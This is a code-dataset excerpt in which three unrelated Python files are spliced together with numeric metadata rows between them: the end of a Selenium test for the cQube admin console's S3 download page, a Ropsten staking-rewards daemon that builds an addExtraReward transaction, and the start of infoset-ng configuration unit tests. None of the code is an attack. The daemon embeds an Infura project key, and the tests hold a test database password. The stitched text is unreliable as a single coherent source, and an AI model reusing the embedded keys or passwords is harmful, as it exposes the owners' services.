self.driver.find_element_by_id(Data.Dashboard).click()
self.data.page_loading(self.driver)
self.driver.find_element_by_id("downloads").click()
self.data.page_loading(self.driver)
print("choosing radio button and downloading s3 files")
bucket_name = Select(self.driver.find_element_by_name("bucketName"))
bucket_name.select_by_visible_text(' cqube-qa-input ')
self.data.page_loading(self.driver)
self.driver.find_element_by_xpath(Data.s3bucket_select1).click()
self.data.page_loading(self.driver)
self.driver.find_element_by_id("btn").click()
time.sleep(3)
self.data.page_loading(self.driver)
self.driver.find_element_by_id("homeBtn").click()
self.data.page_loading(self.driver)
def test_cqube_output(self):
self.driver.find_element_by_id(Data.Dashboard).click()
self.data.page_loading(self.driver)
self.driver.find_element_by_id("downloads").click()
self.data.page_loading(self.driver)
print("choosing radio button and downloading s3 files")
bucket_name = Select(self.driver.find_element_by_name("bucketName"))
bucket_name.select_by_visible_text(' cqube-qa-output ')
self.data.page_loading(self.driver)
self.driver.find_element_by_xpath(Data.s3bucket_select1).click()
self.data.page_loading(self.driver)
self.driver.find_element_by_id("btn").click()
time.sleep(3)
self.data.page_loading(self.driver)
self.driver.find_element_by_id("homeBtn").click()
self.data.page_loading(self.driver)
def test_cqube_emission(self):
self.driver.find_element_by_id(Data.Dashboard).click()
self.data.page_loading(self.driver)
self.driver.find_element_by_id("downloads").click()
self.data.page_loading(self.driver)
print("choosing radio button and downloading s3 files")
bucket_name = Select(self.driver.find_element_by_name("bucketName"))
bucket_name.select_by_visible_text(' cqube-qa-emission ')
self.data.page_loading(self.driver)
self.driver.find_element_by_xpath(Data.s3bucket_select1).click()
self.data.page_loading(self.driver)
self.driver.find_element_by_id("btn").click()
time.sleep(3)
self.data.page_loading(self.driver)
self.driver.find_element_by_id("homeBtn").click()
self.data.page_loading(self.driver)
def test_logoutbtn(self):
count =0
self.driver.find_element_by_id(Data.Dashboard).click()
self.data.page_loading(self.driver)
self.driver.find_element_by_id("downloads").click()
self.data.page_loading(self.driver)
self.driver.find_element_by_id(Data.logout).click()
self.data.page_loading(self.driver)
if 'Log in to cQube' in self.driver.title:
print('Logout button is working ')
else:
print('logout btn is not working')
count = count + 1
self.data.page_loading(self.driver)
self.data.login_to_adminconsole(self.driver)
self.assertEqual(0,count,msg='Logout is failed')
self.data.page_loading(self.driver)
@classmethod
def tearDownClass(cls):
cls.driver.close()
| 43.652632 | 91 | 0.679527 | 1,114 | 8,294 | 4.821364 | 0.09605 | 0.20108 | 0.118414 | 0.187488 | 0.865388 | 0.861292 | 0.846956 | 0.838019 | 0.823683 | 0.823683 | 0 | 0.007142 | 0.206535 | 8,294 | 189 | 92 | 43.883598 | 0.808996 | 0 | 0 | 0.739884 | 0 | 0 | 0.111285 | 0 | 0 | 0 | 0 | 0 | 0.017341 | 1 | 0.069364 | false | 0 | 0.034682 | 0 | 0.109827 | 0.098266 | 0 | 0 | 0 | null | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
768df76a0cdebe4bc4157c2aa91996a9bc028159 | 23,761 | py | Python | frontend/src/rewards_node_daemon/rewards_daemon_ropsten.py | cmayorga/blockchain-developer-bootcamp-final-project | 0e5712f244e823e88686bc79774f8580ab06f0ad | [
"MIT"
] | 1 | 2021-12-13T07:39:01.000Z | 2021-12-13T07:39:01.000Z | frontend/src/rewards_node_daemon/rewards_daemon_ropsten.py | cmayorga/blockchain-developer-bootcamp-final-project | 0e5712f244e823e88686bc79774f8580ab06f0ad | [
"MIT"
] | 1 | 2021-12-12T23:21:35.000Z | 2021-12-21T02:15:29.000Z | frontend/src/rewards_node_daemon/rewards_daemon_ropsten.py | cmayorga/blockchain-developer-bootcamp-final-project | 0e5712f244e823e88686bc79774f8580ab06f0ad | [
"MIT"
] | null | null | null | #only for CONSRewards v2
import json
import web3
import sys
from web3 import Web3
import time;
from datetime import datetime,timezone
if len(sys.argv) < 3:
print("Usage details: rewards_daemon.py owner_address owneraddres_private_key")
exit()
#CONSUser = "0xFC8d59ed72dc74007131e894cf1Be9Ea9A38C554"
CONSRewards_address = "0xcf87c85097ac3c8af52e8b29bff1fbb38068e35c"
eth_url = "https://ropsten.infura.io/v3/17aaa2ed017c44edaf69e8859d2cd89c" #CARLOS
web3 = Web3(Web3.HTTPProvider(eth_url))
chainId = 3 #Ropsten
owner_address = web3.toChecksumAddress(sys.argv[1]) # CONSRewards Owner address
owner_pc = sys.argv[2] # CONSRewards Owner address Private key
address = web3.toChecksumAddress(CONSRewards_address)
#CONS Rewards smart contract: abi, address and bytecode
abi = json.loads('[{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"reward","type":"uint256"}],"name":"RewardAdded","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"user","type":"address"},{"indexed":false,"internalType":"uint256","name":"reward","type":"uint256"}],"name":"RewardPaid","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"user","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount","type":"uint256"}],"name":"Staked","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"user","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount","type":"uint256"}],"name":"Withdrawn","type":"event"},{"constant":true,"inputs":[],"name":"CARLOS","outputs":[{"internalType":"contract IERC20","name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"DURATION","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"CONS","outputs":[{"internalType":"contract IERC20","name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"accumulatedStakingPower","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"uint256","name":"extrareward","type":"uint256"}],"name":"addExtraReward","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"blockts","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"currentEpochReward","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"earned","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[],"name":"exit","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"extraEpochReward","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"fixedCurrentEpochReward","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[],"name":"getReward","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"isOwner","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"lastTimeRewardApplicable","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"lastUpdateTime","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"uint256","name":"reward","type":"uint256"}],"name":"notifyRewardAmount","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"periodFinish","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[],"name":"renounceOwnership","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"rewardPerToken","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"rewardPerTokenStored","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"rewardRate","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"rewardSystemFinished","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"rewards","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"bool","name":"finished","type":"bool"}],"name":"setFarmingFinished","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"stake","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"stakingPower","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"starttime","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"totalAccumulatedReward","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"userRewardPerTokenPaid","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"withdraw","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"}]')
bytecode = "6080604052600080546001600160a01b0319908116739f0523e2194873227b9d462ed0970a3debb634a9178255600480549091167344c20d6869ec46b78e76bd9c051518476a9bbdc017905560078190556008819055426009819055600a829055600b805460ff19169055600c55600d556100816001600160e01b036100d216565b600380546001600160a01b0319166001600160a01b0392831617908190556040519116906000907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a36100d6565b3390565b611a4b806100e56000396000f3fe608060405234801561001057600080fd5b50600436106102055760003560e01c80638da588971161011a578063ddc2b169116100ad578063e9fad8ee1161007c578063e9fad8ee14610437578063ebe2b12b1461043f578063ed92091414610447578063f2fde38b1461044f578063ffe489021461047557610205565b8063ddc2b169146103f9578063df136d6514610401578063e68e035b14610409578063e9b46e6d1461041157610205565b8063a694fc3a116100e9578063a694fc3a146103c4578063c8f33c91146103e1578063cd3daf9d146103e9578063d3d4a5af146103f157610205565b80638da58897146103745780638da5cb5b1461037c5780638f32d59b146103a05780639c916d19146103bc57610205565b806353cef1d21161019d5780637b0a47ee1161016c5780637b0a47ee1461032e5780637e126d98146103365780637fba03a01461033e57806380faa57d146103465780638b8763471461034e57610205565b806353cef1d2146102c4578063635cb4e2146102e357806370a0823114610300578063715018a61461032657610205565b8063207e821d116101d9578063207e821d146102785780632e1a7d4d146102805780633c6b16ab1461029f5780633d18b912146102bc57610205565b80628cc2621461020a5780630700037d1461024257806318160ddd146102685780631be0528914610270575b600080fd5b6102306004803603602081101561022057600080fd5b50356001600160a01b031661049b565b60408051918252519081900360200190f35b6102306004803603602081101561025857600080fd5b50356001600160a01b0316610521565b610230610533565b61023061053a565b610230610541565b61029d6004803603602081101561029657600080fd5b5035610547565b005b61029d600480360360208110156102b557600080fd5b503561063a565b61029d610819565b61029d600480360360208110156102da57600080fd5b50351515610b83565b61029d600480360360208110156102f957600080fd5b5035610be1565b6102306004803603602081101561031657600080fd5b50356001600160a01b0316610ca1565b61029d610cbc565b610230610d4d565b610230610d53565b610230610d59565b610230610d5f565b6102306004803603602081101561036457600080fd5b50356001600160a01b0316610d72565b610230610d84565b610384610d8a565b604080516001600160a01b039092168252519081900360200190f35b6103a8610d99565b604080519115158252519081900360200190f35b610384610dbf565b61029d600480360360208110156103da57600080fd5b5035610dce565b6102306110ac565b6102306110b2565b610230611106565b6103a861110c565b610230611115565b61023061111b565b6102306004803603602081101561042757600080fd5b50356001600160a01b0316611121565b61029d611133565b61023061114e565b610384611154565b61029d6004803603602081101561046557600080fd5b50356001600160a01b0316611163565b6102306004803603602081101561048b57600080fd5b50356001600160a01b03166111b3565b6001600160a01b038116600090815260116020908152604080832054601090925282205461051b919061050f90670de0b6b3a764000090610503906104ee906104e26110b2565b9063ffffffff6111e616565b6104f788610ca1565b9063ffffffff61122f16565b9063ffffffff61128816565b9063ffffffff6112ca16565b92915050565b60116020526000908152604090205481565b6001545b90565b62093a8081565b60085481565b600b54339060ff1661056a5761055b6110b2565b600f55610566610d5f565b600e555b6001600160a01b038116156105ae576105828161049b565b6001600160a01b038216600090815260116020908152604080832093909355600f546010909152919020555b600082116105f7576040805162461bcd60e51b8152602060048201526011602482015270043616e6e6f74207769746864726177203607c1b604482015290519081900360640190fd5b61060082611324565b60408051838152905133917f7084f5476618d8e60b11ef0d7d3f06914655adb8793e28ff7f018d4c76d505d5919081900360200190a25050565b610642610d99565b610681576040805162461bcd60e51b815260206004820181905260248201526000805160206119d4833981519152604482015290519081900360640190fd5b600b5460009060ff166106a5576106966110b2565b600f556106a1610d5f565b600e555b6001600160a01b038116156106e9576106bd8161049b565b6001600160a01b038216600090815260116020908152604080832093909355600f546010909152919020555b600a54156107285760405162461bcd60e51b81526004018080602001828103825260238152602001806119f46023913960400191505060405180910390fd5b4260095560058290556006829055600854610749908363ffffffff6112ca16565b6008556005546107629062093a8063ffffffff61128816565b600d5542600e81905561077e9062093a8063ffffffff6112ca16565b600a5560048054600554604080516340c10f1960e01b815230948101949094526024840191909152516001600160a01b03909116916340c10f1991604480830192600092919082900301818387803b1580156107d957600080fd5b505af11580156107ed573d6000803e3d6000fd5b505060055460408051918252516000805160206119938339815191529350908190036020019150a15050565b600b54339060ff1661083c5761082d6110b2565b600f55610838610d5f565b600e555b6001600160a01b03811615610880576108548161049b565b6001600160a01b038216600090815260116020908152604080832093909355600f546010909152919020555b60095442116108c2576040805162461bcd60e51b81526020600482015260096024820152681b9bdd081cdd185c9d60ba1b604482015290519081900360640190fd5b6000600a5411610910576040805162461bcd60e51b8152602060048201526014602482015273141bdbdb081a185cc81b9bdd081cdd185c9d195960621b604482015290519081900360640190fd5b42600c819055600a541180159061092a5750600b5460ff16155b15610a6e5761094a6064610503600560065461122f90919063ffffffff16565b6006540360068190555060016006541115610a5b576007546006546109749163ffffffff6112ca16565b600581905560006007556008546109909163ffffffff6112ca16565b6008556005546109a99062093a8063ffffffff61128816565b600d556109bf4262093a8063ffffffff6112ca16565b600a5560048054600654604080516340c10f1960e01b815230948101949094526024840191909152516001600160a01b03909116916340c10f1991604480830192600092919082900301818387803b158015610a1a57600080fd5b505af1158015610a2e573d6000803e3d6000fd5b505060055460408051918252516000805160206119938339815191529350908190036020019150a1610a69565b600b805460ff191660011790555b42600e555b6000610a793361049b565b90508015610b7f5733600090815260116020908152604080832054601290925290912054610aac9163ffffffff6112ca16565b336000818152601260209081526040808320949094556011815283822082905560048054855163a9059cbb60e01b8152918201949094526024810186905293516001600160a01b039093169363a9059cbb9360448083019491928390030190829087803b158015610b1c57600080fd5b505af1158015610b30573d6000803e3d6000fd5b505050506040513d6020811015610b4657600080fd5b505060408051828152905133917fe2403640ba68fed3a2f88b7557551d1993f84b99bb10ff833f0cf8db0c5e0486919081900360200190a25b5050565b610b8b610d99565b610bca576040805162461bcd60e51b815260206004820181905260248201526000805160206119d4833981519152604482015290519081900360640190fd5b42600e55600b805460ff1916911515919091179055565b610be9610d99565b610c28576040805162461bcd60e51b815260206004820181905260248201526000805160206119d4833981519152604482015290519081900360640190fd5b600b5460ff1615610c80576040805162461bcd60e51b815260206004820152601760248201527f4661726d696e672069732066696e697368656420796574000000000000000000604482015290519081900360640190fd5b600754610c93908263ffffffff6112ca16565b600755610c9e6113ed565b50565b6001600160a01b031660009081526002602052604090205490565b610cc4610d99565b610d03576040805162461bcd60e51b815260206004820181905260248201526000805160206119d4833981519152604482015290519081900360640190fd5b6003546040516000916001600160a01b0316907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600380546001600160a01b0319169055565b600d5481565b60065481565b600c5481565b6000610d6d42600a546115fc565b905090565b60106020526000908152604090205481565b60095481565b6003546001600160a01b031690565b6003546000906001600160a01b0316610db0611612565b6001600160a01b031614905090565b6000546001600160a01b031681565b600b54339060ff16610df157610de26110b2565b600f55610ded610d5f565b600e555b6001600160a01b03811615610e3557610e098161049b565b6001600160a01b038216600090815260116020908152604080832093909355600f546010909152919020555b42600c819055600a5411801590610e4f5750600b5460ff16155b15610f9357610e6f6064610503600560065461122f90919063ffffffff16565b6006540360068190555060016006541115610f8057600754600654610e999163ffffffff6112ca16565b60058190556000600755600854610eb59163ffffffff6112ca16565b600855600554610ece9062093a8063ffffffff61128816565b600d55610ee44262093a8063ffffffff6112ca16565b600a5560048054600654604080516340c10f1960e01b815230948101949094526024840191909152516001600160a01b03909116916340c10f1991604480830192600092919082900301818387803b158015610f3f57600080fd5b505af1158015610f53573d6000803e3d6000fd5b505060055460408051918252516000805160206119938339815191529350908190036020019150a1610f8e565b600b805460ff191660011790555b42600e555b6009544211610fd5576040805162461bcd60e51b81526020600482015260096024820152681b9bdd081cdd185c9d60ba1b604482015290519081900360640190fd5b6000600a5411611023576040805162461bcd60e51b8152602060048201526014602482015273141bdbdb081a185cc81b9bdd081cdd185c9d195960621b604482015290519081900360640190fd5b60008211611069576040805162461bcd60e51b815260206004820152600e60248201526d043616e6e6f74207374616b6520360941b604482015290519081900360640190fd5b61107282611616565b60408051838152905133917f9e71bc8eea02a63969f509818f2dafb9254532904319f9dbda79b67bd34a5f3d919081900360200190a25050565b600e5481565b60006110bc610533565b6110c95750600f54610537565b610d6d6110f76110d7610533565b610503670de0b6b3a76400006104f7600d546104f7600e546104e2610d5f565b600f549063ffffffff6112ca16565b60075481565b600b5460ff1681565b600f5481565b60055481565b60126020526000908152604090205481565b61114461113f33610ca1565b610547565b61114c610819565b565b600a5481565b6004546001600160a01b031681565b61116b610d99565b6111aa576040805162461bcd60e51b815260206004820181905260248201526000805160206119d4833981519152604482015290519081900360640190fd5b610c9e81611793565b600061051b6111c18361049b565b6001600160a01b0384166000908152601260205260409020549063ffffffff6112ca16565b600061122883836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250611834565b9392505050565b60008261123e5750600061051b565b8282028284828161124b57fe5b04146112285760405162461bcd60e51b81526004018080602001828103825260218152602001806119b36021913960400191505060405180910390fd5b600061122883836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f0000000000008152506118cb565b600082820183811015611228576040805162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015290519081900360640190fd5b600154611337908263ffffffff6111e616565b6001553360009081526002602052604090205461135a908263ffffffff6111e616565b336000818152600260209081526040808320949094558154845163a9059cbb60e01b815260048101949094526024840186905293516001600160a01b039094169363a9059cbb93604480820194918390030190829087803b1580156113be57600080fd5b505af11580156113d2573d6000803e3d6000fd5b505050506040513d60208110156113e857600080fd5b505050565b6113f5610d99565b611434576040805162461bcd60e51b815260206004820181905260248201526000805160206119d4833981519152604482015290519081900360640190fd5b600b5460009060ff16611458576114496110b2565b600f55611454610d5f565b600e555b6001600160a01b0381161561149c576114708161049b565b6001600160a01b038216600090815260116020908152604080832093909355600f546010909152919020555b42600c819055600a54118015906114b65750600b5460ff16155b15610c9e576114d66064610503600560065461122f90919063ffffffff16565b60065403600681905550600160065411156115e7576007546006546115009163ffffffff6112ca16565b6005819055600060075560085461151c9163ffffffff6112ca16565b6008556005546115359062093a8063ffffffff61128816565b600d5561154b4262093a8063ffffffff6112ca16565b600a5560048054600654604080516340c10f1960e01b815230948101949094526024840191909152516001600160a01b03909116916340c10f1991604480830192600092919082900301818387803b1580156115a657600080fd5b505af11580156115ba573d6000803e3d6000fd5b505060055460408051918252516000805160206119938339815191529350908190036020019150a16115f5565b600b805460ff191660011790555b42600e5550565b600081831061160b5781611228565b5090919050565b3390565b3361162081611930565b15611665576040805162461bcd60e51b815260206004820152601060248201526f1c1b1e8819985c9b48189e481a185b9960821b604482015290519081900360640190fd5b326001600160a01b038216146116b5576040805162461bcd60e51b815260206004820152601060248201526f1c1b1e8819985c9b48189e481a185b9960821b604482015290519081900360640190fd5b6001546116c8908363ffffffff6112ca16565b6001556001600160a01b0381166000908152600260205260409020546116f4908363ffffffff6112ca16565b6001600160a01b03808316600081815260026020908152604080832095909555815485516323b872dd60e01b8152600481019490945230602485015260448401889052945194909316936323b872dd936064808501949193918390030190829087803b15801561176357600080fd5b505af1158015611777573d6000803e3d6000fd5b505050506040513d602081101561178d57600080fd5b50505050565b6001600160a01b0381166117d85760405162461bcd60e51b815260040180806020018281038252602681526020018061196d6026913960400191505060405180910390fd5b6003546040516001600160a01b038084169216907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a3600380546001600160a01b0319166001600160a01b0392909216919091179055565b600081848411156118c35760405162461bcd60e51b81526004018080602001828103825283818151815260200191508051906020019080838360005b83811015611888578181015183820152602001611870565b50505050905090810190601f1680156118b55780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b505050900390565b6000818361191a5760405162461bcd60e51b8152602060048201818152835160248401528351909283926044909101919085019080838360008315611888578181015183820152602001611870565b50600083858161192657fe5b0495945050505050565b6000813f7fc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a47081158015906119645750808214155b94935050505056fe4f776e61626c653a206e6577206f776e657220697320746865207a65726f2061646472657373de88a922e0d3b88b24e9623efeb464919c6bf9f66857a65e2bfcf2ce87a9433d536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f774f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65724f6e6c792063616e2063616c6c206f6e636520746f207374617274207374616b696e67a265627a7a723158207c0bc63ebc4c66dd2aa5d49ce459422f8fc01932571681d8b80632b1e2d1c42464736f6c63430005110032"
contract = web3.eth.contract(address = address, abi = abi, bytecode = bytecode)
#con = contract.functions.rewardPerToken().call()
#print(con)
##transaction = contract.functions.notifyRewardAmount(rewardAmount).buildTransaction({'chainId': chainId, 'gas':80000, 'nonce': web3.eth.getTransactionCount(owner_address)})
periodFinish = contract.functions.periodFinish().call()
#blockinfo = web3.eth.getBlock('latest')
#print("blockinfo: ", blockinfo)
#last_block_timestamp = web3.eth.getBlock('latest').timestamp
#print("last_block_timestamp: ", last_block_timestamp)
dt = datetime.now(timezone.utc)
now_utc = dt.timestamp()
print("period_finish: ", periodFinish)
print("current system_time_utc: ", now_utc)
tdelta=(datetime.fromtimestamp(now_utc) - datetime.fromtimestamp(periodFinish))
#diff is negative as t2 is in the future compared to t2
seconds = tdelta.total_seconds()
print('difference is {0} seconds'.format(abs(tdelta.total_seconds())))
if (seconds < 60):
print(now_utc, " is lower than ", periodFinish, "nothing to do")
else:
#exit(1) #debugging
print(now_utc, " is greater than ", periodFinish, " updating rewards")
rewardAmount = 690000 * 1000000000000000000 #69000
print("rewardAmount:", rewardAmount)
transaction = contract.functions.addExtraReward(int(rewardAmount)).buildTransaction({'chainId': chainId, 'gas':200000, 'nonce': web3.eth.getTransactionCount(owner_address)})
print(transaction)
#commented for debug
#signed_txn = web3.eth.account.signTransaction(transaction, owner_pc)
#txn_hash = web3.eth.sendRawTransaction(signed_txn.rawTransaction)
#print(txn_hash) | 371.265625 | 13,934 | 0.873532 | 1,000 | 23,761 | 20.723 | 0.178 | 0.019109 | 0.044299 | 0.037398 | 0.218212 | 0.212421 | 0.206872 | 0.199295 | 0.194566 | 0.190851 | 0 | 0.526787 | 0.013341 | 23,761 | 64 | 13,935 | 371.265625 | 0.357149 | 0.036404 | 0 | 0 | 0 | 0.028571 | 0.946999 | 0.935382 | 0 | 1 | 0.001841 | 0 | 0 | 1 | 0 | false | 0 | 0.171429 | 0 | 0.171429 | 0.228571 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
4f7255fdda1b77d3184d5d31aac0117bcef11b24 | 25,217 | py | Python | infoset/test/test_configuration.py | clayton-colovore/infoset-ng | b0404fdda9e805effc16cebc9caef5f86b6bfe33 | [
"Apache-2.0"
] | null | null | null | infoset/test/test_configuration.py | clayton-colovore/infoset-ng | b0404fdda9e805effc16cebc9caef5f86b6bfe33 | [
"Apache-2.0"
] | null | null | null | infoset/test/test_configuration.py | clayton-colovore/infoset-ng | b0404fdda9e805effc16cebc9caef5f86b6bfe33 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
"""Test the db_agent library in the infoset.db module."""
import os.path
import tempfile
import unittest
import yaml
import os
import sys
# Try to create a working PYTHONPATH
_TEST_DIRECTORY = os.path.dirname(os.path.realpath(__file__))
_LIB_DIRECTORY = os.path.abspath(os.path.join(_TEST_DIRECTORY, os.pardir))
_ROOT_DIRECTORY = os.path.abspath(os.path.join(_LIB_DIRECTORY, os.pardir))
if _TEST_DIRECTORY.endswith('/infoset-ng/infoset/test') is True:
sys.path.append(_ROOT_DIRECTORY)
else:
print(
'This script is not installed in the "infoset-ng/bin" directory. '
'Please fix.')
sys.exit(2)
from infoset.utils import configuration
class TestConfiguration(unittest.TestCase):
"""Checks all functions and methods."""
#########################################################################
# General object setup
#########################################################################
log_directory = tempfile.mkdtemp()
cache_directory = tempfile.mkdtemp()
good_config = ("""\
main:
log_directory: %s
log_level: debug
ingest_cache_directory: %s
ingest_pool_size: 20
bind_port: 3000
interval: 300
sqlalchemy_pool_size: 10
sqlalchemy_max_overflow: 10
memcached_hostname: localhost
memcached_port: 22122
db_hostname: localhost
db_username: test_infoset
db_password: test_B3bFHgxQfsEy86TN
db_name: test_infoset
""") % (log_directory, cache_directory)
# Convert good_config to dictionary
good_dict = yaml.safe_load(bytes(good_config, 'utf-8'))
# Set the environmental variable for the configuration directory
directory = tempfile.mkdtemp()
os.environ['INFOSET_CONFIGDIR'] = directory
config_file = ('%s/test_config.yaml') % (directory)
# Write good_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(good_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
@classmethod
def tearDownClass(cls):
"""Post test cleanup."""
os.rmdir(cls.log_directory)
os.rmdir(cls.cache_directory)
os.remove(cls.config_file)
os.rmdir(cls.directory)
def test_init(self):
"""Testing method init."""
# Testing with non-existant directory
directory = 'bogus'
os.environ['INFOSET_CONFIGDIR'] = directory
with self.assertRaises(SystemExit):
configuration.Config()
# Testing with an empty directory
empty_directory = tempfile.mkdtemp()
os.environ['INFOSET_CONFIGDIR'] = empty_directory
with self.assertRaises(SystemExit):
configuration.Config()
# Write bad_config to file
empty_config_file = ('%s/test_config.yaml') % (empty_directory)
with open(empty_config_file, 'w') as f_handle:
f_handle.write('')
# Create configuration object
config = configuration.Config()
with self.assertRaises(SystemExit):
config.log_file()
# Cleanup files in temp directories
_delete_files(directory)
def test_log_file(self):
"""Testing method log_file."""
# Test the log_file with a good_dict
# good key and key_value
result = self.config.log_file()
self.assertEqual(result, ('%s/infoset-ng.log') % (self.log_directory))
def test_web_log_file(self):
"""Testing method web_log_file ."""
# Testing web_log_file with a good dictionary.
result = self.config.web_log_file()
self.assertEqual(result, ('%s/api-web.log') % (self.log_directory))
def test_log_level(self):
"""Testing method log_level."""
# Tesing with a good_dictionary
# good key and good key_value
result = self.config.log_level()
self.assertEqual(result, 'debug')
self.assertEqual(result, self.good_dict['main']['log_level'])
# Set the environmental variable for the configuration directory
directory = tempfile.mkdtemp()
os.environ['INFOSET_CONFIGDIR'] = directory
config_file = ('%s/test_config.yaml') % (directory)
# Testing log_level with blank key and blank key_value
key = ''
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
# Write bad_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
with self.assertRaises(SystemExit):
config.log_level()
# Testing log_level with good key and blank key_value
key = 'log_level:'
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
